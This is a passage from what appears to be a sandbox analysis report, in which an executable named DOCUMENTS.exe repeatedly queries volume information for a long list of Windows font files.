                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
